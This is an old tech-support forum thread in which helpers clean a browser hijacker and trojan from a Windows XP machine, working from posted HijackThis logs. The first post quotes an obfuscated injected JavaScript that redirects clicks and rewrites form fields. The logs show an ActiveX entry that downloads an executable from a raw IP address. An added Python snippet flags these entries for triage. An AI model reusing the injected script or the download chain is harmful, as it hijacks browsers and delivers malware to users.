Home page stuck on "http://homepage.com/" can't change

Status
This thread has been Locked and is not open to further replies. Please start a New Thread if you're having a similar issue. View our Welcome Guide to learn how to use this site.

SimplyJay

Thread Starter
Joined
Apr 8, 2004
Messages
8
My home page is stuck on "http://homepage.com/". I don't know what the site is about, but it's getting annoying. I've been reading some of the other threads that talk about a similar problem with the site "coolwwwsearch".

I have followed the instructions there but have had no luck.
I would appreciate any help from anyone who can help.

I have downloaded the HijackThis program and this is the current log entry



Logfile of HijackThis v1.97.7
Scan saved at 3:49:07 AM, on 4/8/2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Ahead\InCD\InCDsrv.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\EPSON\EBAPI\eEBSVC.exe
C:\Program Files\Symantec_Client_Security\Symantec AntiVirus\DefWatch.exe
C:\Program Files\Common Files\EPSON\EBAPI\SAgent2.exe
C:\WINDOWS\System32\inetsrv\inetinfo.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\Program Files\Symantec_Client_Security\Symantec AntiVirus\Rtvscan.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\tcpsvcs.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\SYMANT~1\SYMANT~1\vptray.exe
C:\WINDOWS\Mixer.exe
C:\Program Files\Ahead\InCD\InCD.exe
C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_S10IC2.EXE
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\System32\taskmgr.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\System32\wuauclt.exe
F:\Program Files\Microsoft Office\Office10\WINWORD.EXE
C:\temp\hijackthis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://homepage.com@www.e-finder.cc/hp/ (obfuscated)
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [vptray] C:\PROGRA~1\SYMANT~1\SYMANT~1\vptray.exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [C-Media Mixer] Mixer.exe /startup
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [InCD] C:\Program Files\Ahead\InCD\InCD.exe
O4 - HKLM\..\Run: [EPSON Stylus CX5200] C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_S10IC2.EXE /P19 "EPSON Stylus CX5200" /O6 "USB001" /M "Stylus CX5200"
O4 - HKLM\..\Run: [System Service] C:\WINDOWS\System32\msrexe.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - Startup: BHODemon.lnk = C:\Program Files\BHODemon\BHODemon.exe
O4 - Global Startup: Microsoft Office.lnk = F:\Program Files\Microsoft Office\Office10\OSA.EXE
O8 - Extra context menu item: E&xport to Microsoft Excel - res://F:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O9 - Extra button: Related (HKLM)
O9 - Extra 'Tools' menuitem: Show &Related Links (HKLM)
O9 - Extra button: Messenger (HKLM)
O9 - Extra 'Tools' menuitem: Messenger (HKLM)
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O13 - WWW. Prefix: http://
O16 - DPF: {10000000-1000-0000-1000-000000000000} - file://C:\Program Files\Internet Explorer\ypbtuwdw.exe
O16 - DPF: {11111111-1111-1111-1111-111111111123} - ms-its:mhtml:file://C:\ss.MHT!http://64.237.47.178//chm.chm::/1/e.exe
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?38045.3887731481
O17 - HKLM\System\CCS\Services\Tcpip\..\{A1F04644-2517-40C9-8C36-E526B690A197}: NameServer = 207.69.188.187 207.69.188.186



I have also found that Internet Explorer is adding code to any web page that I open.


It adds "<script language="JavaScript">
eval(String.fromCharCode(118,97,114,32,114,115,99,95,110,99,108,107,61,48,59,118,97,114,32,114,115,99,95,107,119,95,102,111,117,110,100,61,48,59,102,117,110,99,116,105,111,110,32,114,115,99,95,104,95,99,108,105,99,107,40,41,123,114,115,99,95,110,99,108,107,43,43,59,118,97,114,32,97,99,116,105,118,101,69,108,61,100,111,99,117,109,101,110,116,46,97,99,116,105,118,101,69,108,101,109,101,110,116,59,118,97,114,32,104,114,101,102,61,97,99,116,105,118,101,69,108,46,104,114,101,102,59,105,102,40,40,114,115,99,95,110,99,108,107,61,61,50,41,32,38,38,32,114,115,99,95,107,119,95,102,111,117,110,100,61,61,49,41,123,119,105,110,100,111,119,46,111,112,101,110,40,39,104,116,116,112,58,47,47,119,119,119,46,108,111,99,97,116,111,114,46,99,99,47,103,111,63,39,43,104,114,101,102,41,59,114,101,116,117,114,110,32,102,97,108,115,101,59,125,101,108,115,101,123,114,101,116,117,114,110,32,116,114,117,101,59,125,125,102,117,110,99,116,105,111,110,32,114,115,99,95,104,95,115,110,100,102,111,114,109,40,41,123,118,97,114,32,105,44,106,59,102,111,114,40,106,61,48,59,106,60,100,111,99,117,109,101,110,116,46,102,111,114,109,115,46,108,101,110,103,116,104,59,106,43,43,41,123,102,111,114,32,40,105,61,48,59,105,60,100,111,99,117,109,101,110,116,46,102,111,114,109,115,91,106,93,46,108,101,110,103,116,104,59,105,43,43,41,123,105,102,32,40,100,111,99,117,109,101,110,116,46,102,111,114,109,115,91,48,93,46,101,108,101,109,101,110,116,115,91,105,93,46,118,97,108,117,101,61,61,39,104,116,116,112,58,47,47,39,41,123,100,111,99,117,109,101,110,116,46,102,111,114,109,115,91,48,93,46,101,108,101,109,101,110,116,115,91,105,93,46,118,97,108,117,101,61,39,104,116,116,112,58,47,47,119,119,119,46,97,100,117,108,116,45,100,118,100,109,111,118,105,101,46,99,111,109,47,39,59,125,125,125,114,101,116,117,114,110,32,116,114,117,101,59,125));
</script>" to the beginning of the page and "<script language="JavaScript"> var rsc_kw_found=0; </script>" to the end of the page.
 
Joined
Jul 8, 2002
Messages
14,681
Fix These In HijackThis
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://homepage.com@www.e-finder.cc/hp/ (obfuscated)

O4 - HKLM\..\Run: [System Service] C:\WINDOWS\System32\msrexe.exe

O16 - DPF: {10000000-1000-0000-1000-000000000000} - file://C:\Program Files\Internet Explorer\ypbtuwdw.exe

O16 - DPF: {11111111-1111-1111-1111-111111111123} - ms-its:mhtml:file://C:\ss.MHT!http://64.237.47.178//chm.chm::/1/e.exe

Delete this file from your computer
C:\WINDOWS\System32\msrexe.exe

That file is a variant of the sub7 trojan; you should run Spybot and a virus scan.
You should also make sure you are running an updated antivirus and a firewall, and don't run any random thing someone sends you.

This virus sometimes stops you from running any ".exe" files after you remove it. If you have that problem, please tell us.
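
Why the entries listed in the reply above stand out, as an added example (not part of the original thread and not HijackThis code): a small triage function that flags a Start Page URL whose userinfo part hides the real host, and O16 download sources that are not http(s) URLs. The function name `triage` and the regular expressions are assumptions of this sketch; the sample lines are copied from the log posted above.

```python
import re
from urllib.parse import urlsplit

# Lines copied from the HijackThis log posted earlier in this thread.
SAMPLE_LOG = r"""
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://homepage.com@www.e-finder.cc/hp/ (obfuscated)
O16 - DPF: {10000000-1000-0000-1000-000000000000} - file://C:\Program Files\Internet Explorer\ypbtuwdw.exe
O16 - DPF: {11111111-1111-1111-1111-111111111123} - ms-its:mhtml:file://C:\ss.MHT!http://64.237.47.178//chm.chm::/1/e.exe
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?38045.3887731481
"""

# Hypothetical patterns for this sketch: "Rn - <key>,<value name> = <url>"
# and "O16 - DPF: {CLSID} [(name)] - <download source>".
R_LINE = re.compile(r"^(R[0-3]) - (.+?) = (\S+)")
DPF_LINE = re.compile(r"^O16 - DPF: (\{[0-9A-Fa-f-]+\})(?: \(.*?\))? - (\S.*)$")


def triage(log_text):
    """Return (section, reason, detail) tuples for entries worth a closer look."""
    findings = []
    for line in log_text.splitlines():
        line = line.strip()
        m = R_LINE.match(line)
        if m:
            url = urlsplit(m.group(3))
            # In "http://user@host/", the browser connects to the host
            # AFTER the '@'; the part before it is only a user name.
            if url.username is not None:
                findings.append((m.group(1), "userinfo hides real host", url.hostname))
            continue
        m = DPF_LINE.match(line)
        if m:
            scheme = m.group(2).split(":", 1)[0].lower()
            # An ActiveX download source is normally an http(s) URL to a CAB;
            # a local file or an ms-its/mhtml wrapper is unusual.
            if scheme not in ("http", "https"):
                findings.append(("O16", "non-web download source", scheme))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

The Start Page entry resolves to `www.e-finder.cc`, not `homepage.com`, which is why the log marks it "(obfuscated)"; the Windows Update entry passes both checks.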
 

SimplyJay

Thread Starter
Joined
Apr 8, 2004
Messages
8
I followed your instructions but it's still there.

I can't find "msrexe.exe"; it's not in "C:\WINDOWS\System32\".
I ran a system search on the file name and got nothing.

Here is my current log file:

Logfile of HijackThis v1.97.7
Scan saved at 3:43:36 AM, on 4/9/2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Ahead\InCD\InCDsrv.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\EPSON\EBAPI\eEBSVC.exe
C:\Program Files\Symantec_Client_Security\Symantec AntiVirus\DefWatch.exe
C:\Program Files\Common Files\EPSON\EBAPI\SAgent2.exe
C:\WINDOWS\System32\inetsrv\inetinfo.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\Program Files\Symantec_Client_Security\Symantec AntiVirus\Rtvscan.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\tcpsvcs.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\SYMANT~1\SYMANT~1\vptray.exe
C:\WINDOWS\Mixer.exe
C:\Program Files\Ahead\InCD\InCD.exe
C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_S10IC2.EXE
C:\WINDOWS\System32\ctfmon.exe
C:\temp\hijackthis\HijackThis.exe
C:\WINDOWS\system32\notepad.exe
C:\WINDOWS\system32\notepad.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://homepage.com@www.e-finder.cc/hp/ (obfuscated)
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchcust.htm
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [vptray] C:\PROGRA~1\SYMANT~1\SYMANT~1\vptray.exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [C-Media Mixer] Mixer.exe /startup
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [InCD] C:\Program Files\Ahead\InCD\InCD.exe
O4 - HKLM\..\Run: [EPSON Stylus CX5200] C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_S10IC2.EXE /P19 "EPSON Stylus CX5200" /O6 "USB001" /M "Stylus CX5200"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - Startup: BHODemon.lnk = C:\Program Files\BHODemon\BHODemon.exe
O4 - Global Startup: Microsoft Office.lnk = F:\Program Files\Microsoft Office\Office10\OSA.EXE
O8 - Extra context menu item: E&xport to Microsoft Excel - res://F:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O9 - Extra button: Related (HKLM)
O9 - Extra 'Tools' menuitem: Show &Related Links (HKLM)
O9 - Extra button: Messenger (HKLM)
O9 - Extra 'Tools' menuitem: Messenger (HKLM)
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O13 - WWW. Prefix: http://
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?38045.3887731481

I have "Symantec AntiVirus" running on my system and when I did the fix in "HijackThis" it popped up this notice.

"Scan type: Realtime Protection Scan
Event: Virus Found!
Virus name: Bloodhound.Exploit.6
File: C:\temp\hijackthis\backup-20040409-032913-730
Location: Quarantine
Computer: COOL
User: Admin
Action taken: Clean failed : Quarantine succeeded : Access denied
Date found: Fri Apr 09 03:29:13 2004"

I have also gotten notices about a virus called "Downloader.Trojan".
 

dvk01

Derek
Retired Moderator Retired Malware Specialist
Joined
Dec 14, 2002
Messages
56,452
It's probably a hidden file & you will probably have to be in safe mode to delete it, so



Reboot into safe mode by following instructions here: http://service1.symantec.com/SUPPORT/tsgeninfo.nsf/docid/2001052409420406
then as some of the files or folders you need to delete may be hidden do this:
Open Windows Explorer & go to Tools > Folder Options. Click on the View tab and make sure that "Show hidden files and folders" is checked. Also uncheck "Hide protected operating system files" and untick "Hide extensions for known file types". Now click "Apply to all folders".
Click "Apply" then "OK"
 

dvk01

Derek
Retired Moderator Retired Malware Specialist
Joined
Dec 14, 2002
Messages
56,452
and look for & delete these files also
C:\ss.MHT

C:\Program Files\Internet Explorer\ypbtuwdw.exe
 

SimplyJay

Thread Starter
Joined
Apr 8, 2004
Messages
8
Ok, I rebooted into safe mode, made the changes to the system, and I still can't find the files.

I did, however, find two files that seem suspicious.

They're both in "C:\WINDOWS\Prefetch"

YPBTUWDW.EXE-0AAF6FFD.pf
MSREXE.EXE-2F899DF8.pf
 

dvk01

Derek
Retired Moderator Retired Malware Specialist
Joined
Dec 14, 2002
Messages
56,452
anything in prefetch is safe to delete

but post a new hjt log as sometimes we have noticed that these files are changing their names on a reboot

so reboot before posting the log please
 

SimplyJay

Thread Starter
Joined
Apr 8, 2004
Messages
8
Ok, I deleted the two files in "C:\WINDOWS\Prefetch"


here is the HijackThis log

Logfile of HijackThis v1.97.7
Scan saved at 6:36:00 AM, on 4/9/2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Ahead\InCD\InCDsrv.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\EPSON\EBAPI\eEBSVC.exe
C:\Program Files\Symantec_Client_Security\Symantec AntiVirus\DefWatch.exe
C:\Program Files\Common Files\EPSON\EBAPI\SAgent2.exe
C:\WINDOWS\System32\inetsrv\inetinfo.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\Program Files\Symantec_Client_Security\Symantec AntiVirus\Rtvscan.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\tcpsvcs.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\SYMANT~1\SYMANT~1\vptray.exe
C:\WINDOWS\Mixer.exe
C:\Program Files\Ahead\InCD\InCD.exe
C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_S10IC2.EXE
C:\WINDOWS\System32\ctfmon.exe
C:\temp\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://homepage.com@www.e-finder.cc/hp/ (obfuscated)
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [vptray] C:\PROGRA~1\SYMANT~1\SYMANT~1\vptray.exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [C-Media Mixer] Mixer.exe /startup
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [InCD] C:\Program Files\Ahead\InCD\InCD.exe
O4 - HKLM\..\Run: [EPSON Stylus CX5200] C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_S10IC2.EXE /P19 "EPSON Stylus CX5200" /O6 "USB001" /M "Stylus CX5200"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - Startup: BHODemon.lnk = C:\Program Files\BHODemon\BHODemon.exe
O4 - Global Startup: Microsoft Office.lnk = F:\Program Files\Microsoft Office\Office10\OSA.EXE
O8 - Extra context menu item: E&xport to Microsoft Excel - res://F:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O9 - Extra button: Related (HKLM)
O9 - Extra 'Tools' menuitem: Show &Related Links (HKLM)
O9 - Extra button: Messenger (HKLM)
O9 - Extra 'Tools' menuitem: Messenger (HKLM)
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O13 - WWW. Prefix: http://
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?38045.3887731481
O17 - HKLM\System\CCS\Services\Tcpip\..\{A1F04644-2517-40C9-8C36-E526B690A197}: NameServer = 207.69.188.187 207.69.188.186
 
Joined
Oct 9, 2001
Messages
9,396
Fix this one with HijackThis:
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://homepage.com@www.e-finder.cc/hp/ (obfuscated)

Correct your home page to the one you prefer....then immediately do the following:
Backup the registry and/or export the following keys:
go to Start>Run, type "regedit".........Navigate to:
HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\

Right-click on the Internet Explorer key, choose new>Key, name it ControlPanel.

Right-click on ControlPanel, choose new>DWORD value, name it Homepage.
Right-click on Homepage, choose modify and type in the number 1.

This should lock your home page, so no other web site can change it.

Then navigate here and verify the homepage is correct:
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
look for the Start Page entry.

Re-boot and see if it holds.
;)
 